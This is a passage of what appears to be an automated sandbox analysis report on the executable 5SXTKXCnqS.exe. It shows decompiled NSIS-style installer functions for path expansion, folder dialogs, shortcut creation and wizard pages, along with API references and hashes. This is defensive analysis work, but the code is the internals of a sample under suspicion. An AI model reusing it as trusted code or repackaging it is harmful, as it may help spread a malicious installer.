                                                                                    0x004043fb
                                                                                    0x00404402
                                                                                    0x00404676
                                                                                    0x00404688
                                                                                    0x00404688
                                                                                    0x0040440d
                                                                                    0x00000000
                                                                                    0x0040440d

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 004043A2
                                                                                    • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                    • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040448F
                                                                                    • lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
                                                                                    • lstrcatA.KERNEL32(?,Call), ref: 004044CD
                                                                                    • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                      • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                      • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                      • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                    • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                    • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                    • API String ID: 2246997448-2175137099
                                                                                    • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                    • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                    • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                    • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 74%
                                                                                    			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                    0x00405b88
                                                                                    0x00405b88
                                                                                    0x00405b88
                                                                                    0x00405b8e
                                                                                    0x00405b93
                                                                                    0x00405ba4
                                                                                    0x00405ba4
                                                                                    0x00405baf
                                                                                    0x00405bb1
                                                                                    0x00405bb6
                                                                                    0x00405bb9
                                                                                    0x00405bba
                                                                                    0x00405bc1
                                                                                    0x00405bc3
                                                                                    0x00405bc9
                                                                                    0x00405bcc
                                                                                    0x00405bcc
                                                                                    0x00405da5
                                                                                    0x00405da5
                                                                                    0x00405da9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405bd9
                                                                                    0x00405bdf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405be5
                                                                                    0x00405be6
                                                                                    0x00405be9
                                                                                    0x00405bec
                                                                                    0x00405d98
                                                                                    0x00405da2
                                                                                    0x00405da4
                                                                                    0x00405da4
                                                                                    0x00405d9a
                                                                                    0x00405d9c
                                                                                    0x00405d9e
                                                                                    0x00405d9f
                                                                                    0x00405d9f
                                                                                    0x00000000
                                                                                    0x00405d98
                                                                                    0x00405bf2
                                                                                    0x00405bf6
                                                                                    0x00405c06
                                                                                    0x00405c0a
                                                                                    0x00405c11
                                                                                    0x00405c14
                                                                                    0x00405c18
                                                                                    0x00405c1e
                                                                                    0x00405c21
                                                                                    0x00405c24
                                                                                    0x00405c27
                                                                                    0x00405d42
                                                                                    0x00405d45
                                                                                    0x00405d75
                                                                                    0x00405d78
                                                                                    0x00405d7d
                                                                                    0x00405d81
                                                                                    0x00405d81
                                                                                    0x00405d86
                                                                                    0x00405d87
                                                                                    0x00405d8c
                                                                                    0x00405d8f
                                                                                    0x00405d91
                                                                                    0x00000000
                                                                                    0x00405d91
                                                                                    0x00405d47
                                                                                    0x00405d4a
                                                                                    0x00405d5f
                                                                                    0x00405d66
                                                                                    0x00405d4c
                                                                                    0x00405d53
                                                                                    0x00405d53
                                                                                    0x00405d6e
                                                                                    0x00405d71
                                                                                    0x00405d3a
                                                                                    0x00405d3b
                                                                                    0x00405d3b
                                                                                    0x00000000
                                                                                    0x00405d71
                                                                                    0x00405c2f
                                                                                    0x00405c30
                                                                                    0x00405c36
                                                                                    0x00405c38
                                                                                    0x00405c52
                                                                                    0x00405c52
                                                                                    0x00405c59
                                                                                    0x00405c59
                                                                                    0x00405c60
                                                                                    0x00405c64
                                                                                    0x00405c64
                                                                                    0x00405c65
                                                                                    0x00405c67
                                                                                    0x00405ca0
                                                                                    0x00405ca3
                                                                                    0x00405cb3
                                                                                    0x00405cb6
                                                                                    0x00405cbe
                                                                                    0x00405cc4
                                                                                    0x00405cc4
                                                                                    0x00405d20
                                                                                    0x00405d20
                                                                                    0x00405d22
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405cc8
                                                                                    0x00405ccf
                                                                                    0x00405cd0
                                                                                    0x00405cd2
                                                                                    0x00405cec
                                                                                    0x00405cfa
                                                                                    0x00405d00
                                                                                    0x00405d02
                                                                                    0x00405d1d
                                                                                    0x00405d1d
                                                                                    0x00405d1d
                                                                                    0x00000000
                                                                                    0x00405d1d
                                                                                    0x00405d08
                                                                                    0x00405d13
                                                                                    0x00405d19
                                                                                    0x00405d1b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d1b
                                                                                    0x00405cd4
                                                                                    0x00405cd7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405ce6
                                                                                    0x00405ce8
                                                                                    0x00405cea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405cea
                                                                                    0x00000000
                                                                                    0x00405d20
                                                                                    0x00405cab
                                                                                    0x00000000
                                                                                    0x00405c69
                                                                                    0x00405c6e
                                                                                    0x00405c84
                                                                                    0x00405c89
                                                                                    0x00405c8c
                                                                                    0x00405d29
                                                                                    0x00405d29
                                                                                    0x00405d2d
                                                                                    0x00405d35
                                                                                    0x00405d35
                                                                                    0x00000000
                                                                                    0x00405d2d
                                                                                    0x00405c96
                                                                                    0x00405d24
                                                                                    0x00405d24
                                                                                    0x00405d27
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d27
                                                                                    0x00405c67
                                                                                    0x00405c3a
                                                                                    0x00405c3e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405c40
                                                                                    0x00405c44
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405c46
                                                                                    0x00405c4a
                                                                                    0x00000000
                                                                                    0x00405c4c
                                                                                    0x00405c4c
                                                                                    0x00000000
                                                                                    0x00405c4c
                                                                                    0x00405c4a
                                                                                    0x00405daf
                                                                                    0x00405db9
                                                                                    0x00405dc5
                                                                                    0x00405dc5
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                    • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                    • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                    • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                    • lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 900638850-1230650788
                                                                                    • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                    • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                    • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                    • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 74%
                                                                                    			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                    0x00402029
                                                                                    0x00402033
                                                                                    0x0040203c
                                                                                    0x00402046
                                                                                    0x0040204f
                                                                                    0x00402059
                                                                                    0x0040205d
                                                                                    0x0040205d
                                                                                    0x00402062
                                                                                    0x00402073
                                                                                    0x0040207b
                                                                                    0x0040215b
                                                                                    0x0040215b
                                                                                    0x00402162
                                                                                    0x00402081
                                                                                    0x00402081
                                                                                    0x00402092
                                                                                    0x00402096
                                                                                    0x0040209c
                                                                                    0x004020a6
                                                                                    0x004020a8
                                                                                    0x004020b3
                                                                                    0x004020b6
                                                                                    0x004020c3
                                                                                    0x004020c5
                                                                                    0x004020c7
                                                                                    0x004020ce
                                                                                    0x004020d1
                                                                                    0x004020d1
                                                                                    0x004020d4
                                                                                    0x004020de
                                                                                    0x004020e6
                                                                                    0x004020eb
                                                                                    0x004020f7
                                                                                    0x004020f7
                                                                                    0x004020fa
                                                                                    0x00402103
                                                                                    0x00402106
                                                                                    0x0040210f
                                                                                    0x00402114
                                                                                    0x00402126
                                                                                    0x00402135
                                                                                    0x00402137
                                                                                    0x00402143
                                                                                    0x00402143
                                                                                    0x00402135
                                                                                    0x00402145
                                                                                    0x0040214b
                                                                                    0x0040214b
                                                                                    0x0040214e
                                                                                    0x00402154
                                                                                    0x00402159
                                                                                    0x0040216e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402159
                                                                                    0x00402164
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 123533781-1943935188
                                                                                    • Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                    • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                    • Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                    • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 39%
                                                                                    			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                    0x00402656
                                                                                    0x0040266a
                                                                                    0x00402675
                                                                                    0x00402676
                                                                                    0x004027b1
                                                                                    0x00402658
                                                                                    0x00402658
                                                                                    0x0040265a
                                                                                    0x0040265c
                                                                                    0x0040265c
                                                                                    0x0040288e
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                    • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                    • Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                    • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 83%
                                                                                    			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
